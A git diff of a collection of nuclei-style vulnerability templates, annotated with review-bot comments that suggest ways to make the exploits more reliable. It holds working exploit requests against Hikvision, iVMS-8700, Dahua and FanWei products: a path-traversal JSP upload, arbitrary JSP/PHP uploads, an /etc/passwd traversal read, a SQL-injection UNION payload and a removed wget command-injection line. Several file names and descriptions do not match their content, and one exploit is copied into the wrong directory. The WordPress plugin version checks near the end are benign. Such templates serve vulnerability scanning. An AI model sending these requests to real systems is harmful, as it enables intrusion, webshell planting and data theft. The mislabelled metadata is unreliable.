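Review bot: The upload uses a fixed `test.jsp` name and a fixed `test` marker, so `contains(body_2, "test")` also matches a 404 or error page that merely echoes the requested `test.jsp` path, and the first-request check `contains(body_1, "data")` is similarly loose. Randomise both with `rand_base(6)` variables, as the iVMS-8700 `upload.action` template in this same commit already does, and match on the random marker. The traversal target `.../tomcat85linux64.1/webapps/eportal/` is a hard-coded install path and the dropped JSP is never removed, so the template should carry an `intrusive` tag and a description noting that the written file persists.
```yaml
variables:
  str1: '{{rand_base(6)}}'
  str2: '{{rand_base(6)}}'

http:
  - raw:
      - |
        POST /svm/api/external/report HTTP/1.1
        # … unchanged: Host and Content-Type headers …
        Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/{{str1}}.jsp"
        Content-Type: application/zip

        <%out.print("{{str2}}");%>
        ------WebKitFormBoundary9PggsiM755PLa54a--
      - |
        GET /portal/ui/login/..;/..;/{{str1}}.jsp HTTP/1.1
        # … unchanged: Host and User-Agent headers …

    # … unchanged: req-condition …
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200'
          - 'contains(body_1, "data")'
          - 'status_code_2 == 200'
          - 'contains(body_2, "{{str2}}")'
        condition: and
```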
@@ -1,50 +1,48 @@ id: HIKVISION info: - name: HHIKVISION iVMS-8700 upload Webshell file - author: zerZero Trust Security Attack and Defense Laboratory + name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file + author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file + HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files metadata: fofa-query: icon_hash="-911494769" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" variables: - str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' + str1: '{{rand_base(6)}}' + str2: '{{rand_base(6)}}' + str3: '<%out.print("{{str2}}");%>' http: - raw: - | - POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 + POST /eps/resourceOperations/upload.action HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 184 - Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 - - --c4155aff43901a8b2a19a4641a5efa15 - Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" + User-Agent: MicroMessenger + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj + + ------WebKitFormBoundaryTJyhtTNqdMNLZLhj + Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp" Content-Type: image/jpeg - {{randstr}} - --c4155aff43901a8b2a19a4641a5efa15-- + {{str3}} + ------WebKitFormBoundaryTJyhtTNqdMNLZLhj-- - | - GET /eps/upload/{{name}}.jsp HTTP/1.1 + GET /eps/upload/{{res_id}}.jsp HTTP/1.1 Host: {{Hostname}} extractors: - type: json - name: name + name: res_id json: - 
".data.resourceUuid" internal: true matchers: - - type: word - words: - - '{{randstr}}' + - type: dsl + dsl: + - body_2 == str2 diff --git a/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml b/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml index b35ef84818..1cd783867f 100644 --- a/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml +++ b/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml @@ -1,11 +1,11 @@ id: Green-Alliance info: - name: Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability + name: Green Alliance SAS Fortress GetFile Arbitrary File Read Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: high + severity: medium description: | - Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability + There is an arbitrary user login vulnerability in the Green Alliance Fortress machine, which allows attackers to exploit vulnerabilities including www/local_ User. php enables any user to log in metadata: fofa-query: body="'/needUsbkey.php?username='" hunter-query: web.body="'/needUsbkey.php?username='" @@ -14,36 +14,15 @@ info: http: - method: GET path: - - "{{BaseURL}}/webconf/Exec/index?cmd=id" + - "{{BaseURL}}/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: word part: body words: - - "200" + - "nologin" - type: status status: - 200 - - -# http: -# - method: GET -# path: -# - "{{BaseURL}}/webconf/Exec/index?cmd=wget%20{{interactsh-url}}" - -# attack: clusterbomb -# matchers-condition: or -# matchers: -# - type: word -# part: interactsh_protocol -# name: http -# words: -# - "http" - -# - type: word -# part: interactsh_protocol -# name: dns -# words: -# - "dns" diff --git a/poc/upload/dahua-wpms-addimgico-fileupload.yaml b/poc/upload/dahua-wpms-addimgico-fileupload.yaml index c7afb0444b..fa3aafbfe2 100644 --- a/poc/upload/dahua-wpms-addimgico-fileupload.yaml +++ b/poc/upload/dahua-wpms-addimgico-fileupload.yaml 
@@ -1,50 +1,68 @@ id: CVE-2023-3836 info: - name: 大华-WPMS-upload-addimgico - author: hufei - severity: high + name: Dahua Smart Park Management - Arbitrary File Upload + author: HuTa0 + severity: critical description: | - 大华 智慧园区综合管理平台 devicePoint_addImgIco 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限 + Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?. + remediation: | + Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/tree/main/docs/wiki/iot/%E5%A4%A7%E5%8D%8E + - https://github.com/qiuhuihk/cve/blob/main/upload.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 + - https://vuldb.com/?ctiid.235162 + - https://vuldb.com/?id.235162 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-3836 + cwe-id: CWE-434 + epss-score: 0.03083 + epss-percentile: 0.8997 + cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: app="大华-智慧园区综合管理平台" - hunter-query: app.name="Dahua 大华 智慧园区管理平台" verified: true + max-request: 2 + vendor: dahuasecurity + product: smart_parking_management + shodan-query: html:"/WPMS/asset" + zoomeye-query: /WPMS/asset + tags: cve,cve2023,dahua,fileupload,intrusive,rce +variables: + random_str: "{{rand_base(6)}}" + match_str: "{{md5(random_str)}}" http: - raw: - | POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 + Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT Host: {{Hostname}} - User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 177 - 
Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29 - --e00b34d08d13639f8b619829b04c1a29 - Content-Disposition: form-data; name="upload"; filename="test.jsp" - Content-Type: image/gif - - {{randstr}} - --e00b34d08d13639f8b619829b04c1a29-- + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT + Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp" + Content-Type: application/octet-stream + Content-Transfer-Encoding: binary + {{match_str}} + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- - | - GET /upload/emap/society_new/{{name}} HTTP/1.1 + GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1 Host: {{Hostname}} + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && status_code_2 == 200" + - "contains(body_2, '{{match_str}}')" + condition: and + extractors: - - type: json - name: name - json: - - ".data" + - type: regex + name: shell_filename internal: true - - matchers: - - type: word - words: - - '{{randstr}}' \ No newline at end of file + part: body_1 + regex: + - 'ico_res_(\w+)_on\.jsp' +# digest: 4b0a00483046022100abbf084a12dda14741c23c4c2c7c8e7b6e231142a8333a69df8844ea1271532d022100a7a0d0f5b8caf3beb1708fed446cd4bf7efbe83fc8fa26aae836cb243dd64804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml b/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml index 4e7ede529c..8c93d2bd55 100644 --- a/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml +++ b/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml 
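Review bot: The replacement `description` no longer states what the vulnerability is — `Dahua wisdom park integrated management platform is a comprehensive management platform, ... including/emap/devicePoint_addImgIco?.` is a truncated product blurb, whereas the removed Chinese text said the `devicePoint_addImgIco` interface accepts arbitrary file uploads. Suggest `description: | The devicePoint_addImgIco interface of the Dahua Smart Park Comprehensive Management Platform does not validate uploaded file types, allowing an unauthenticated attacker to upload a JSP file under /upload/emap/society_new/ and execute code on the server.` The trailing `# digest:` line appears to be the upstream nuclei-templates signature over the exact upstream bytes; if this copy is edited locally (including the description fix above) that signature will no longer verify, so either keep the file verbatim or drop the digest line when changing it.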
@@ -1,29 +1,39 @@ id: FanWei - info: - name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability + name: FanWei Micro OA E-Office Uploadify Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- + The pan micro OA E-Office uploads files in uploadify.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability metadata: - fofa-query: app="泛微-协同办公OA" - hunter-query: web.title="泛微-协同办公OA" - + fofa-query: app="泛微-EOffice" + hunter-query: web.title="泛微软件" http: - raw: - | - GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 + POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) - Accept-Encoding: gzip, deflate + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 Connection: close + Content-Length: 259 + Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 + Accept-Encoding: gzip + + --e64bdf16c554bbc109cecef6451c26a4 + Content-Disposition: form-data; name="Filedata"; filename="test.php" + Content-Type: image/jpeg + + + + --e64bdf16c554bbc109cecef6451c26a4-- req-condition: true matchers: - type: dsl dsl: - - 'contains(body_1, "c4ca")' + - 'status_code_1 == 200 && len(body) > 0' condition: and + +# /attachment/3466744850/xxx.php diff --git a/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml b/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml index c7afb0444b..fa3aafbfe2 100644 --- a/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml 
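Review bot: The new matcher `status_code_1 == 200 && len(body) > 0` does not confirm an upload at all — any 200 response with a non-empty body, including an error page, will be reported as a high-severity arbitrary file upload. The comment `# /attachment/3466744850/xxx.php` suggests the response returns the stored path; extract it and fetch the file in a second request carrying a random marker in the part body, as the sibling `upload.php` template in this commit attempts, or at least match on the returned `attachment` path in `body_1`. Two smaller issues: the fixed `filename="test.php"` with an empty body is still written to the server with no cleanup (tag the template `intrusive`), and the hard-coded `Content-Length: 259` should be dropped unless the runner is known to recompute it for raw requests, since it does not match the body as written.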
+++ b/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml 
@@ -1,50 +1,68 @@ id: CVE-2023-3836 info: - name: 大华-WPMS-upload-addimgico - author: hufei - severity: high + name: Dahua Smart Park Management - Arbitrary File Upload + author: HuTa0 + severity: critical description: | - 大华 智慧园区综合管理平台 devicePoint_addImgIco 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限 + Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?. + remediation: | + Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/tree/main/docs/wiki/iot/%E5%A4%A7%E5%8D%8E + - https://github.com/qiuhuihk/cve/blob/main/upload.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 + - https://vuldb.com/?ctiid.235162 + - https://vuldb.com/?id.235162 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-3836 + cwe-id: CWE-434 + epss-score: 0.03083 + epss-percentile: 0.8997 + cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: app="大华-智慧园区综合管理平台" - hunter-query: app.name="Dahua 大华 智慧园区管理平台" verified: true + max-request: 2 + vendor: dahuasecurity + product: smart_parking_management + shodan-query: html:"/WPMS/asset" + zoomeye-query: /WPMS/asset + tags: cve,cve2023,dahua,fileupload,intrusive,rce +variables: + random_str: "{{rand_base(6)}}" + match_str: "{{md5(random_str)}}" http: - raw: - | POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 + Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT Host: {{Hostname}} - User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 177 - 
Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29 - --e00b34d08d13639f8b619829b04c1a29 - Content-Disposition: form-data; name="upload"; filename="test.jsp" - Content-Type: image/gif - - {{randstr}} - --e00b34d08d13639f8b619829b04c1a29-- + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT + Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp" + Content-Type: application/octet-stream + Content-Transfer-Encoding: binary + {{match_str}} + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- - | - GET /upload/emap/society_new/{{name}} HTTP/1.1 + GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1 Host: {{Hostname}} + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && status_code_2 == 200" + - "contains(body_2, '{{match_str}}')" + condition: and + extractors: - - type: json - name: name - json: - - ".data" + - type: regex + name: shell_filename internal: true - - matchers: - - type: word - words: - - '{{randstr}}' \ No newline at end of file + part: body_1 + regex: + - 'ico_res_(\w+)_on\.jsp' +# digest: 4b0a00483046022100abbf084a12dda14741c23c4c2c7c8e7b6e231142a8333a69df8844ea1271532d022100a7a0d0f5b8caf3beb1708fed446cd4bf7efbe83fc8fa26aae836cb243dd64804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/wordpress/geo-my-wp-dcc08c9ab9de422a732b6dceb3c19f4e.yaml b/poc/wordpress/geo-my-wp-dcc08c9ab9de422a732b6dceb3c19f4e.yaml new file mode 100644 index 0000000000..9437c65c82 --- /dev/null +++ b/poc/wordpress/geo-my-wp-dcc08c9ab9de422a732b6dceb3c19f4e.yaml 
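Review bot: This file is a byte-for-byte copy of `poc/upload/dahua-wpms-addimgico-fileupload.yaml` from the same commit (identical index `c7afb0444b..fa3aafbfe2`) placed under `poc/wordpress/`, but the target is the Dahua Smart Park platform, not a WordPress plugin. Two templates with `id: CVE-2023-3836` in one tree will, if the runner deduplicates or warns on duplicate ids as nuclei does, leave one copy silently unused; remove this copy rather than maintain both. The misfiling also means a directory-scoped or `-tags wordpress` run fires an intrusive JSP upload against hosts that are not WordPress at all.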
@@ -0,0 +1,59 @@ +id: geo-my-wp-dcc08c9ab9de422a732b6dceb3c19f4e + +info: + name: > + GEO my WordPress <= 4.5.0.1 - Unauthenticated Local File Inclusion + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1e65922a-3498-4946-8415-3d922e85e46a?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/geo-my-wp/" + google-query: inurl:"/wp-content/plugins/geo-my-wp/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,geo-my-wp,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/geo-my-wp/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "geo-my-wp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.5.0.1') \ No newline at end of file diff --git a/poc/wordpress/wp-accessibility-helper-2ebee88d3cc127551f1f7c34b744653e.yaml b/poc/wordpress/wp-accessibility-helper-2ebee88d3cc127551f1f7c34b744653e.yaml new file mode 100644 index 0000000000..9d75abbe7a --- /dev/null +++ b/poc/wordpress/wp-accessibility-helper-2ebee88d3cc127551f1f7c34b744653e.yaml 
@@ -0,0 +1,59 @@ +id: wp-accessibility-helper-2ebee88d3cc127551f1f7c34b744653e + +info: + name: > + WP Accessibility Helper <= 0.6.2.8 - Missing Authorization to Authenticated (Subscriber+) Limited Settings Update + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d3beee75-0480-4504-a177-45f8cd32cf36?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-accessibility-helper/" + google-query: inurl:"/wp-content/plugins/wp-accessibility-helper/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-accessibility-helper,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-accessibility-helper/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-accessibility-helper" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.6.2.8') \ No newline at end of file diff --git a/poc/wordpress/wp-simple-firewall-2453dc94f5e62cf781881087cb516889.yaml b/poc/wordpress/wp-simple-firewall-2453dc94f5e62cf781881087cb516889.yaml new file mode 100644 index 0000000000..bb2b8bb468 --- /dev/null +++ b/poc/wordpress/wp-simple-firewall-2453dc94f5e62cf781881087cb516889.yaml 
@@ -0,0 +1,59 @@ +id: wp-simple-firewall-2453dc94f5e62cf781881087cb516889 + +info: + name: > + Shield Security – Smart Bot Blocking & Intrusion Prevention Security <= 20.0.5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f23e7274-45f6-46da-b4c8-2eaa1bd39257?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-simple-firewall/" + google-query: inurl:"/wp-content/plugins/wp-simple-firewall/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-simple-firewall,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-simple-firewall/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-simple-firewall" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 20.0.5') \ No newline at end of file diff --git a/poc/wordpress/wp-table-builder-096fe66e1a6c03883512b366b27ff120.yaml b/poc/wordpress/wp-table-builder-096fe66e1a6c03883512b366b27ff120.yaml new file mode 100644 index 0000000000..ff34f0d30e --- /dev/null +++ b/poc/wordpress/wp-table-builder-096fe66e1a6c03883512b366b27ff120.yaml 
@@ -0,0 +1,59 @@ +id: wp-table-builder-096fe66e1a6c03883512b366b27ff120 + +info: + name: > + WP Table Builder <= 1.5.0 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f41b8d18-4a20-4b99-b375-3fafb41030ee?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-table-builder/" + google-query: inurl:"/wp-content/plugins/wp-table-builder/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-table-builder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-table-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-table-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.0') \ No newline at end of file diff --git a/poc/wordpress/wp-testimonial-widget-71769af2cc0004162bfc766437dc74d0.yaml b/poc/wordpress/wp-testimonial-widget-71769af2cc0004162bfc766437dc74d0.yaml new file mode 100644 index 0000000000..660ee1eda0 --- /dev/null +++ b/poc/wordpress/wp-testimonial-widget-71769af2cc0004162bfc766437dc74d0.yaml 
@@ -0,0 +1,59 @@ +id: wp-testimonial-widget-71769af2cc0004162bfc766437dc74d0 + +info: + name: > + WP Testimonial Widget <= 3.1 - Authenticated (Admin+) SQL Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/072b66dd-a5d3-46b5-92ec-9cc83b8ea8ef?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-testimonial-widget/" + google-query: inurl:"/wp-content/plugins/wp-testimonial-widget/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-testimonial-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-testimonial-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-testimonial-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1') \ No newline at end of file diff --git a/poc/wordpress/wp-testimonial-widget-82d487f0b8fd6103c1335305b84fab11.yaml b/poc/wordpress/wp-testimonial-widget-82d487f0b8fd6103c1335305b84fab11.yaml new file mode 100644 index 0000000000..89a0c65078 --- /dev/null +++ b/poc/wordpress/wp-testimonial-widget-82d487f0b8fd6103c1335305b84fab11.yaml 
@@ -0,0 +1,59 @@ +id: wp-testimonial-widget-82d487f0b8fd6103c1335305b84fab11 + +info: + name: > + WP Testimonial Widget <= 3.1 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b11ccbbd-c909-4160-af36-8f0b50fb1285?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-testimonial-widget/" + google-query: inurl:"/wp-content/plugins/wp-testimonial-widget/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-testimonial-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-testimonial-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-testimonial-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1') \ No newline at end of file diff --git a/poc/wordpress/wp-todo-d321c83fc92b177a4feede0546be070b.yaml b/poc/wordpress/wp-todo-d321c83fc92b177a4feede0546be070b.yaml new file mode 100644 index 0000000000..6ef91edba3 --- /dev/null +++ b/poc/wordpress/wp-todo-d321c83fc92b177a4feede0546be070b.yaml 
@@ -0,0 +1,59 @@ +id: wp-todo-d321c83fc92b177a4feede0546be070b + +info: + name: > + WP To Do <= 1.3.0 - Authenticated (Admin+) Stored Cross-Site Scripting via Task Comments + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b36b9b8a-41b0-4b57-92c7-5acebe2b0bae?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-todo/" + google-query: inurl:"/wp-content/plugins/wp-todo/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-todo,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-todo/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-todo" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.0') \ No newline at end of file